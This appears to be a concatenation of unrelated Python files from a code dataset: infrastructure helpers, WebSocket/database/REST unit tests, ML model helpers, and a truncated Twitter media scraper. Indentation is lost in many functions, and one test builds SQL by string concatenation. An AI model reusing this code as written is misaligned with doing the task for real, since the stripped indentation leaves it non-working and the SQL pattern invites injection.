profile = get_platform_profile(role['platform_profile'])
return profile
def get_hardware_profile_by_role(role_name):
"""
Returns hardware profile details of a role
"""
role = get_role(role_name)
hardware_profiles = settings.getValue('pdf_file')['hardware_profiles']
    profile_details = None
    for profile in hardware_profiles:
        if profile['profile_name'] == role['hardware_profile']:
            profile_details = profile
            break
    return profile_details
def get_cores_by_role(role_name):
"""
Returns cpu cores list of server hardware used in the role
"""
hardware_profile = get_hardware_profile_by_role(role_name)
processor_profile = hardware_profile['profile_info']['processor_profile']
profile = get_processor_profile(processor_profile)
cpus = []
for numa in profile['profile_info']['numas']:
cpus.extend(convert_range_to_list(numa['cpu_set']))
return cpus
def get_nova_conf():
"""
Returns parsed nova.conf
"""
pod = get_pod_with_labels('application=nova,component=compute')
cmd = ['cat', '/etc/nova/nova.conf']
response = kube_exec(pod, cmd)
config = configparser.ConfigParser()
config.read_string(response)
return config
### cpu cores related helper function
def convert_range_to_list(x):
"""
Returns list of numbers from given range as string
e.g.: convert_range_to_list('3-5') will give [3, 4, 5]
"""
# pylint: disable=C0103
result = []
for part in x.split(','):
if '-' in part:
a, b = part.split('-')
a, b = int(a), int(b)
result.extend(range(a, b + 1))
elif part != '':
a = int(part)
result.append(a)
# remove duplicates
result = list(dict.fromkeys(result))
return result
def is_ranges_equals(range1, range2):
"""
Checks whether two ranges passed as string are equal
e.g.: is_ranges_equals('2-5', '2-4,5') returns true
"""
set1 = set(convert_range_to_list(range1))
set2 = set(convert_range_to_list(range2))
return set1 == set2
def are_lists_equal(list1, list2):
"""
Checks whether two list are identicals
"""
set1 = set(list1)
set2 = set(list2)
return set1 == set2
def hex_to_comma_list(hex_mask):
"""
Converts CPU mask given in hex to list of cores
"""
binary = bin(int(hex_mask, 16))[2:]
reversed_binary = binary[::-1]
i = 0
output = ""
for bit in reversed_binary:
if bit == '1':
output = output + str(i) + ','
i = i + 1
return output[:-1]
def comma_list_to_hex(cpus):
"""
Converts a list of cpu cores in corresponding hex value
of cpu-mask
"""
cpu_arr = cpus.split(",")
binary_mask = 0
for cpu in cpu_arr:
binary_mask = binary_mask | (1 << int(cpu))
return format(binary_mask, '02x')
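def _example_cpu_mask_round_trip():
    """
    Hedged illustration of the two mask helpers above (the mask value is made
    up): 0x3c has bits 2-5 set, so it expands to cores '2,3,4,5' and packs
    back to '3c'.
    """
    cores = hex_to_comma_list('3c')
    mask = comma_list_to_hex(cores)
    return cores, mask  # -> ('2,3,4,5', '3c')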
def split_key_value(key_value_str, delimiter='='):
"""
splits given string into key and value based on delimiter
:param key_value_str: example string `someKey=somevalue`
:param delimiter: default delimiter is `=`
:return: [ key, value]
"""
key, value = key_value_str.split(delimiter)
key = key.strip()
value = value.strip()
return key, value
| 2.09375 | 2 |
production/pygsl-0.9.5/testing/__init__.py | juhnowski/FishingRod | 1 | 4915 | """
Here you find either newly implemented modules or alternate implementations
of existing modules. This directory is intended to hold a second implementation
beside the main implementation, so that there can be a discussion about which
implementation to favor in the long run.
"""
| 1.40625 | 1 |
PythonServer/UnitTestCasesForWebSocket.py | Cyberlightning/2D-3DCapture | 2 | 4916 | '''
Created on Mar 6, 2014
@author: tharanga
'''
import unittest
from time import sleep
import EventService as es
from EventService import WebSocketServer as ws
from EventService import EventManager as em
import socket
from base64 import b64encode
import struct
import MySQLdb
import json
import EventService
import flaskr
import tempfile
def encodeMessage( message):
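    """
    Frames `message` as a single websocket frame: the payload is base64
    encoded, b1 sets FIN=1 with opcode 0x1 (text), and the length field uses
    the 7-bit, 16-bit or 64-bit form depending on payload size (RFC 6455).
    """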
message = b64encode(message)
b1 =0x80 | 0x1 & 0x0f
b2 = 0
header=""
payload_len = len(message)
if payload_len < 126 :
header = struct.pack('>BB', b1, payload_len)
message= header +message
elif (payload_len < ((2 ** 16) - 1)):
b2 |= 126
header += chr(b1)
header += chr(b2)
l = struct.pack(">H", payload_len)
header += l
message = header +message
else:
b2 |= 127
header += chr(b1)
header += chr(b2)
l = struct.pack(">Q", payload_len)
header += l
message = header +message
return message
class TestWebSockets(unittest.TestCase):
def setUp(self):
self.wsServer = ws('',12345,'127.0.0.1')
self.wsServer.setRunning(True);
sleep(1)
self.testsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.testsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # Allow address reuse between tests
host = 'localhost' # Get local machine name
port = 12345
self.testsocket.connect((host, port))
def tearDown(self):
self.wsServer.closeConnection();
self.testsocket.close()
sleep(1)
def test_webSocketServerOBject(self):
self.assertEqual(self.wsServer.SERVER, '', "Server set to the desired value")
self.assertEqual(self.wsServer.PORT, 12345, "Server port is set correctly")
self.assertEqual(self.wsServer.LOCALHOST, "127.0.0.1", "Localhost set to 127.0.0.1")
def test_invalid_Request(self):
message= "Test Message"
self.testsocket.send(message)
data = repr(self.testsocket.recv(1024))
#print 'Response to invalid message<TestMessage> %s'%(data)
self.assertEqual(data, '\'CONNECTION_REJECTED\'', "Invalid Message rejected")
def test_valid_WS_Request(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: <KEY>nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
# message = "Test message"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
#print 'Response to valid ws request %s'%wsresponse
self.assertNotEqual(wsresponse, '\'CONNECTION_REJECTED\'', "Connection is not rejected")
self.assertIsNotNone(wsresponse, "Connection Response is not Empty")
self.testsocket.sendall(("Test Message"))
data = repr(self.testsocket.recv(1024))
#print 'Response to un encoded Request %s'%(data)
self.assertEqual(data, "\'Un expected opcode\'", "In valid Message rejected")
def test_invalid_Messge(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: <KEY>==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
sleep(1)
self.testsocket.sendall("Test Message")
data = repr(self.testsocket.recv(1024))
self.assertEqual(data, "\'Un expected opcode\'", "In valid Message rejected")
def test_malformed_Message(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: <KEY>==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
# print wsresponse
self.testsocket.send(encodeMessage("Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end
data = repr(self.testsocket.recv(1024))
self.assertEqual(data, "\'MISFORMATED MESSAGE\'", "Messages with out a type is rejected")
def test_wellformed_Message_for_Text(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: <KEY>nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
# print wsresponse
self.testsocket.send(encodeMessage("1<---->Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end
data = repr(self.testsocket.recv(1024))
print data
self.assertEqual(data, "\'Text received\'", "Text Messages is identified and accepted")
def test_wellformed_Message_for_Json(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
self.testsocket.send(encodeMessage("2<---->Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end
data = repr(self.testsocket.recv(1024))
# print data
self.assertEqual(data, "\'json is received\'", "json Messages is identified and accepted")
##TO RUN THE FOLLOWING UNIT TESTS THE DATABASE IS EXPECTED TO EXIST ALREADY.
##A DATABASE SCRIPT IS PROVIDED TO CREATE THE NECESSARY DATABASES AND TABLES.
##ASSOCIATED DATA IS NOT PROVIDED.
class TestDatabase(unittest.TestCase):
def setUp(self):
self.connection = es.dbConnect()
def tearDown(self):
self.connection.close()
def test_data_insert_data_Read(self):
self.assertIsInstance(self.connection, MySQLdb.connection, "Database connection accurately set")
jsondata ={"type":"image", "time":"2014.3.4_14.40.30", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4583105, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
alt = str(jsondata["position"]["alt"]);
if alt=="None":
alt = '0'
heading = '0'
speed = '0'
width = jsondata["vwidth"]
height =jsondata["vheight"]
if width > height :
screenorientation= 1.00#landscape
else :
screenorientation= 0.00#potrait
filename = jsondata["type"]+"_"+jsondata["time"]+"."+jsondata["ext"]
sqlstring1 = "INSERT INTO Imagedata values (\'"+filename+"\',GeomFromText ('POINT("+ str(jsondata["position"]["lat"])+" "+str(jsondata["position"]["lon"])+")'),"+str(jsondata["position"]["alt"])+","+str(jsondata["position"]["acc"])
sqlstring2 =","+str(jsondata["device"]["gx"])+","+str(jsondata["device"]["gy"])+","+str(jsondata["device"]["gz"])
sqlstring3 = ","+str(jsondata["device"]["ra"])+","+str(jsondata["device"]["rb"])+","+str(jsondata["device"]["rg"])+","+str(screenorientation)+",\'"+jsondata["device"]["orientation"]+"\',now(),\'"+str(jsondata["deviceOS"])+"\',\'"+str(jsondata["browsertype"])+"\',\'"+str(jsondata["deviceType"])+"\');"
sqlstring = sqlstring1 + sqlstring2+ sqlstring3
#print(sqlstring)
es.dbInsert(sqlstring)
sqlreadsting = 'select imagename, Browser,devicetype,X(location) as latitude, Y(location) as longitude from Imagedata where time=\'2014.3.4_14.40.31\''
result = es.dbRead(sqlreadsting)
self.assertIsNotNone(result, "Inserted data is retrieved and it is not null")
for row in result:
self.assertEqual(row[0], "image_2014.3.4_14.40.30.png", "Image name is correctly set and saved")
            self.assertEqual(row[3], 65.0600797, "Latitudes are saved")
            self.assertEqual(row[4], 25.4583105, "Longitudes are saved")
HOST = '127.0.0.1' # The remote host
PORT = 17322
class RestServerTestCase(unittest.TestCase):
def setUp(self):
self.db_fd, flaskr.app.config['DATABASE'] = tempfile.mkstemp()
EventService.app.config['TESTING'] = True
self.app = EventService.app.test_client()
flaskr.init_db()
#self.socketServer = self.app.WebSocketServer('',wsport,'127.0.0.1')
def test_rootpath(self):
rv = self.app.get('/')
assert 'This is a REST Service for 2D3DCapture Server.' in rv.data
def test_post_image(self):
rv = self.app.post('/postImage')
assert 'READY' in rv.data
def test_clossing_websocket(self):
rv =self.app.post('/closewebsocketserver')
        assert 'CLOSED' in rv.data or 'ALREADY_CLOSSED' in rv.data
def test_start_websocket(self):
rv =self.app.get('/startwebsocketserver')
# print rv.data
assert 'READY' in rv.data
def test_post_binary_image(self):
rv =self.app.post('/postBinaryImage')
        assert 'READY' in rv.data or '415 Unsupported Media Type' in rv.data
def test_get_All_Image_Data(self):
rv =self.app.get('/getAllImageData')
jsonmsg = json.loads(rv.data)
self.assertIsNotNone(jsonmsg['imageList'] , "getImageData returns a non None list")
def test_get_location_Image_Data(self):
rv =self.app.get('/getLocationImageData?lat=65.0600797&lon=25.4583105')
jsonmsg = json.loads(rv.data)
self.assertIsNotNone(jsonmsg['imageList'] , "getLocationImageData returns a non None list.This is a feature test for location based image data")
def test_closest_Image_retrieval(self):
jsondata1 ={"type":"image", "time":"2014.3.4_14.40.31", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4583105, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata2 ={"type":"image", "time":"2014.3.4_14.40.32", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4582115, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata3 ={"type":"image", "time":"2014.3.4_14.40.33", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4584104, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata4 ={"type":"image", "time":"2014.3.4_14.40.34", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4586115, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata5 ={"type":"image", "time":"2014.3.4_14.40.35", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4587125, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata6 ={"type":"image", "time":"2014.3.4_14.40.36", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4588125, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
es.saveData(jsondata1)
es.saveData(jsondata2)
es.saveData(jsondata3)
es.saveData(jsondata4)
es.saveData(jsondata5)
es.saveData(jsondata6)
radius = 0.0001
photoList = es.getClosestImages( 65.0601787, 25.4583107, radius )
self.assertEqual(len(photoList), 4, "Length of the list should be equal of the first test")
for row in photoList:
            assert 'image_2014.3.4_14.40.32.png' in row[0] or 'image_2014.3.4_14.40.31.png' in row[0]
photoList2 = es.getClosestImages( 65.0601787, 25.4587107, radius )
self.assertEqual(len(photoList2), 2, "Length of the list should be equal of the second test")
for row in photoList2:
            assert 'image_2014.3.4_14.40.34.png' in row[0] or 'image_2014.3.4_14.40.35.png' in row[0]
def suite():
testsuit =unittest.TestSuite()
testsuit.addTest(TestWebSockets('test_webSocketServerOBject'))
testsuit.addTest(TestWebSockets('test_valid_WS_Request'))
testsuit.addTest(TestWebSockets('test_invalid_Messge'))
testsuit.addTest(TestWebSockets('test_invalid_Request'))
testsuit.addTest(TestWebSockets('test_malformed_Message'))
testsuit.addTest(TestWebSockets('test_wellformed_Message_for_Text'))
testsuit.addTest(TestWebSockets('test_wellformed_Message_for_Json'))
testsuit.addTest(TestDatabase('test_data_insert_data_Read'))
testsuit.addTest(RestServerTestCase('test_rootpath'))
testsuit.addTest(RestServerTestCase('test_post_image'))
testsuit.addTest(RestServerTestCase('test_start_websocket'))
testsuit.addTest(RestServerTestCase('test_clossing_websocket'))
testsuit.addTest(RestServerTestCase('test_post_binary_image'))
testsuit.addTest(RestServerTestCase('test_get_All_Image_Data'))
testsuit.addTest(RestServerTestCase('test_closest_Image_retrieval'))
return testsuit
suite = suite()
runner = unittest.TextTestRunner(verbosity=3)
runner.run(suite)
# if __name__ == "__main__":
# #import sys;sys.argv = ['', 'Test.testName']
# unittest.main() | 2.125 | 2 |
src/tests/client_side/test_main.py | JulianSobott/OpenDrive | 1 | 4917 | <filename>src/tests/client_side/test_main.py
import os
import threading
import time
import unittest
from OpenDrive.client_side import file_changes_json as c_json
from OpenDrive.client_side import interface
from OpenDrive.client_side import main
from OpenDrive.client_side import paths as client_paths
from OpenDrive.server_side import paths as server_paths
from tests.client_side.helper_client import h_register_dummy_user_device_client
from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, \
h_clear_init_all_folders, h_create_empty
class TestMain(unittest.TestCase):
def setUp(self) -> None:
h_clear_init_all_folders()
self._server_process = h_start_server_process()
self.folder1_abs_local_path = client_paths.normalize_path(client_paths.LOCAL_CLIENT_DATA, "folder1")
h_create_empty(self.folder1_abs_local_path)
main.MIN_UPDATE_PAUSE_TIME = 1
def tearDown(self) -> None:
main.shutdown()
h_stop_server_process(self._server_process)
@h_client_routine(clear_folders=False)
def putest_start_logged_in(self):
user = h_register_dummy_user_device_client()
main_thread = threading.Thread(target=main.start, daemon=True)
main_thread.start()
time.sleep(2) # wait till changes.json is created
interface.add_sync_folder(self.folder1_abs_local_path, "folder1")
expected_content = c_json.get_all_data()
file_path = os.path.join(self.folder1_abs_local_path, "dummy.txt")
with open(file_path, "w") as f:
f.write("Hello World")
time.sleep(5) # wait till synchronization finished
expected_path = os.path.join(server_paths.get_users_root_folder(user.user_id), "folder1/dummy.txt")
self.assertTrue(os.path.exists(expected_path), "dummy file is not pulled to server!")
self.assertEqual(expected_content, c_json.get_all_data())
time.sleep(1) # wait till waiting...
| 2.25 | 2 |
site-packages/skimage/io/tests/test_io.py | oz90210/Pyto | 0 | 4918 | <gh_stars>0
import os
import numpy as np
from skimage import io, data_dir
from skimage._shared import testing
from skimage._shared.testing import assert_array_equal
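# Minimal in-memory 1x1 JPEG payload; the local test HTTP server below serves
# it so imread can be exercised against an http:// URL without real network access.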
one_by_one_jpeg = (
b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01'
b'\x00\x01\x00\x00\xff\xdb\x00C\x00\x03\x02\x02\x02\x02'
b'\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04'
b'\x04\x04\x04\x08\x06\x06\x05\x06\t\x08\n\n\t\x08\t\t'
b'\n\x0c\x0f\x0c\n\x0b\x0e\x0b\t\t\r\x11\r\x0e\x0f\x10'
b'\x10\x11\x10\n\x0c\x12\x13\x12\x10\x13\x0f\x10\x10'
b'\x10\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11'
b'\x00\xff\xc4\x00\x14\x00\x01\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xff\xc4\x00'
b'\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\xff\xda\x00\x08\x01\x01\x00'
b'\x00?\x00*\x9f\xff\xd9'
)
def test_stack_basic():
x = np.arange(12).reshape(3, 4)
io.push(x)
assert_array_equal(io.pop(), x)
def test_stack_non_array():
with testing.raises(ValueError):
io.push([[1, 2, 3]])
def test_imread_file_url():
# tweak data path so that file URI works on both unix and windows.
data_path = data_dir.lstrip(os.path.sep)
data_path = data_path.replace(os.path.sep, '/')
image_url = 'file:///{0}/camera.png'.format(data_path)
image = io.imread(image_url)
assert image.shape == (512, 512)
def test_imread_http_url(httpserver):
# httpserver is a fixture provided by pytest-localserver
# https://bitbucket.org/pytest-dev/pytest-localserver/
httpserver.serve_content(one_by_one_jpeg)
# it will serve anything you provide to it on its url.
# we add a /test.jpg so that we can identify the content
# by extension
image = io.imread(httpserver.url + '/test.jpg' + '?' + 's' * 266)
assert image.shape == (1, 1)
| 1.898438 | 2 |
tests/core/feature_extraction/test_galaxyProcessor.py | EmilioCC/gti770-student-framework | 0 | 4919 | <reponame>EmilioCC/gti770-student-framework
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import numpy as np
from unittest import TestCase
from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor
from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy
from commons.helpers.dataset.context import Context
class TestGalaxyProcessor(TestCase):
def setUp(self):
validation_size = 0.2
# Get the ground truth CSV file from script's parameters.
self.galaxy_csv_file = os.environ["VIRTUAL_ENV"] + "/data/csv/galaxy/galaxy.csv"
self.galaxy_images_path = os.environ["VIRTUAL_ENV"] + "/data/images/"
# Create instance of data set loading strategies.
galaxy_label_data_set_strategy = GalaxyDataSetLabelStrategy()
# Set the context to galaxy label data set loading strategy.
context = Context(galaxy_label_data_set_strategy)
context.set_strategy(galaxy_label_data_set_strategy)
self.label_dataset = context.load_dataset(csv_file=self.galaxy_csv_file, one_hot=False,
validation_size=np.float32(validation_size))
def testGalaxyProcessor(self):
# Process galaxies.
galaxy_processor = GalaxyProcessor(self.galaxy_images_path)
#features = galaxy_processor.process_galaxy(self.label_dataset) | 2.375 | 2 |
country/management/commands/populate_countries.py | okchaty/django-country | 1 | 4920 | from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand
from os import path
class Command(BaseCommand):
help = "Populates data"
def handle(self, *args, **options):
fixture_path = path.join(path.dirname(
path.dirname(
path.dirname(
path.abspath(__file__)
)
)
), "fixtures/")
settings.FIXTURE_DIRS = (fixture_path,)
call_command("loaddata", "country", verbosity=1)
| 1.867188 | 2 |
gmso/formats/formats_registry.py | chrisiacovella/gmso | 20 | 4921 | """Registry utilities to handle formats for gmso Topology."""
class UnsupportedFileFormatError(Exception):
"""Exception to be raised whenever the file loading or saving is not supported."""
class Registry:
"""A registry to incorporate a callable with a file extension."""
def __init__(self):
self.handlers = {}
def _assert_can_process(self, extension):
if extension not in self.handlers:
raise UnsupportedFileFormatError(
f"Extension {extension} cannot be processed as no utility "
f"is defined in the current API to handle {extension} files."
)
def get_callable(self, extension):
"""Get the callable associated with extension."""
self._assert_can_process(extension)
return self.handlers[extension]
SaversRegistry = Registry()
LoadersRegistry = Registry()
class saves_as:
"""Decorator to aid saving."""
def __init__(self, *extensions):
extension_set = set(extensions)
self.extensions = extension_set
def __call__(self, method):
"""Register the method as saver for an extension."""
for ext in self.extensions:
SaversRegistry.handlers[ext] = method
return method
class loads_as:
"""Decorator to aid loading."""
def __init__(self, *extensions):
extension_set = set(extensions)
self.extensions = extension_set
def __call__(self, method):
"""Register the method as loader for an extension."""
for ext in self.extensions:
LoadersRegistry.handlers[ext] = method
return method
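# Hedged usage sketch (".demo" and write_demo are hypothetical, not part of the
# real gmso API): decorating registers the callable, get_callable looks it up.
#
#   @saves_as(".demo")
#   def write_demo(top, filename):
#       ...
#
#   writer = SaversRegistry.get_callable(".demo")
#   writer(top, "out.demo")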
| 2.578125 | 3 |
formatter.py | Staist/Python-Text-Formatter | 0 | 4922 | dosyaadi = input("Enter file name: ")
dosyaadi = str(dosyaadi + ".txt")
with open(dosyaadi, 'r') as file :
dosyaicerigi = file.read()
silinecek = str(input("Enter the text that you wish to delete: "))
dosyaicerigi = dosyaicerigi.replace(silinecek, '')
with open(dosyaadi, 'w') as file:
file.write(dosyaicerigi)
file.close()
print("-" * 30)
print("Successfully deleted!")
print("-" * 30)
| 3.765625 | 4 |
covid19/classification/helpers.py | salvacarrion/mltests | 0 | 4923 | import tensorflow as tf
@tf.function
def BinaryAccuracy_Infiltrates(y_true, y_pred, i=0):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Pneumonia(y_true, y_pred, i=1):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Covid19(y_true, y_pred, i=2):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Normal(y_true, y_pred, i=3):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
    def __init__(self, *args, **kwargs):
        # Pop the custom kwarg before delegating so it is not forwarded to ModelCheckpoint
        self.wait_epoch_warmup = kwargs.pop("wait_epoch_warmup", None)
        super().__init__(*args, **kwargs)
def on_epoch_end(self, epoch, logs=None):
if self.wait_epoch_warmup:
if (epoch + 1) >= self.wait_epoch_warmup:
super().on_epoch_end(epoch, logs)
else:
self.epochs_since_last_save += 1
print(f"Skipping save model (wait_epoch_warmup={self.wait_epoch_warmup - (epoch + 1)})")
else:
super().on_epoch_end(epoch, logs)
class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping):
def __init__(self, *args, **kwargs):
self.minimum_epochs = kwargs.get("minimum_epochs", 0)
kwargs.pop('minimum_epochs', None) # Problems with EarlyStopping kwargs
super().__init__(*args, **kwargs)
def on_epoch_end(self, epoch, logs=None):
if epoch >= self.minimum_epochs:
super().on_epoch_end(epoch, logs)
def get_losses():
losses = [tf.keras.losses.BinaryCrossentropy()]
return losses
def get_metrics(single_output_idx, add_normal=False):
metrics = []
if single_output_idx is None: # Multi-label
print("###### Multi-label classification ######")
metrics += [
BinaryAccuracy_Infiltrates,
BinaryAccuracy_Pneumonia,
BinaryAccuracy_Covid19
]
# Add normal class
if add_normal:
metrics.append(BinaryAccuracy_Normal)
else:
print(f"###### Multi-class classification (cls: '{single_output_idx}') ######")
metrics = [
tf.keras.metrics.BinaryAccuracy(),
tf.keras.metrics.AUC(),
tf.keras.metrics.Precision(),
tf.keras.metrics.Recall()
]
return metrics
def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None):
istrainable = not freeze_base_model
# Select backbone
if backbone == "resnet50":
from tensorflow.keras.applications.resnet import ResNet50 as TFModel
from tensorflow.keras.applications.resnet import preprocess_input
elif backbone == "resnet50v2":
from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "resnet101v2":
from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "vgg16":
from tensorflow.keras.applications.vgg16 import VGG16 as TFModel
from tensorflow.keras.applications.vgg16 import preprocess_input
elif backbone == "efficientnetb0":
from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
elif backbone == "efficientnetb7":
from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
else:
raise ValueError(f"Unknown backbone: {backbone}")
if ignore_model:
model = None
else:
# Instantiate base model with pre-trained weights
base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet")
# Freeze base model
# base_model.trainable = istrainable
for layers in base_model.layers:
layers.trainable = istrainable
# Create a new model on top
inputs = base_model.input
x = base_model(inputs)
# Option A
x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x)
# Option B
# x = tf.keras.layers.Flatten(name='flatten')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x)
# Outputs
outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x)
model = tf.keras.Model(inputs, outputs)
return model, preprocess_input
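# Hedged usage sketch (backbone, class count and image size are illustrative
# choices, not values mandated by this project):
#
#   model, preprocess_input = get_model("resnet50", classes=3, target_size=(256, 256))
#   model.compile(optimizer="adam", loss=get_losses(), metrics=get_metrics(None))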
def add_tabular_input(model, classes):
# Input1
input1 = model.input
input2 = tf.keras.layers.Input(shape=(2,), name="input_2b")
# Pre-outputs 1x3 + 1x3
output1 = model.output
output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2)
# Outputs
x = tf.keras.layers.Concatenate(axis=1)([output1, output2])
output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x)
model = tf.keras.Model([input1, input2], output)
return model
def unfreeze_base_model(model, n=None, unfreeze=True):
base_model = model.layers[1].layers
# Select number of layers to unfreeze
idx = 0
if n is not None:
if isinstance(n, int):
idx = n
print(f"Unfreezing {len(base_model) - idx} layers")
elif isinstance(n, float) and 0.0 < n <= 1.0:
idx = int(len(base_model) * n)
print(f"Unfreezing {idx} layers")
else:
raise ValueError("Invalid number of layers")
# We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights)
for layer in base_model[-idx:]:
if not isinstance(layer, tf.keras.layers.BatchNormalization):
layer.trainable = True
| 2.375 | 2 |
null/twitter/twmedia-dl.py | mikoim/funstuff | 0 | 4924 | <reponame>mikoim/funstuff
import re
import json
import time
import sys
import httplib2
from twitter import *
import magic
class TwitterMediaDL:
http = httplib2.Http(".cache")
baseUrl = "https://twitter.com"
consumer_key = ""
consumer_secret = ""
access_token_key = ""
access_token_secret = ""
t = Twitter(auth=OAuth(access_token_key, access_token_secret, consumer_key, consumer_secret))
remaining = None
def http_wrapper(self, uri):
resp, content = self.http.request(
uri=uri, method='GET'
)
return content
def get_medias(self, nickname):
ids = []
for tweet in re.findall("twitter.com/(.+)/status/([0-9]+)",
self.http_wrapper(self.baseUrl + '/%s/media' % nickname).decode()):
ids.append(int(tweet[1]))
max_id = ids[len(ids) - 1]
while 1:
res_raw = self.http_wrapper(
self.baseUrl + '/i/profiles/show/%s/media_timeline?include_available_features=1&include_entities=1&max_id=%d' % (
nickname, max_id)).decode()
try:
res = json.loads(res_raw)
            except ValueError:
print(res_raw)
time.sleep(5)
res_raw = self.http_wrapper(
self.baseUrl + '/i/profiles/show/%s/media_timeline?include_available_features=1&include_entities=1&max_id=%d' % (
nickname, max_id)).decode()
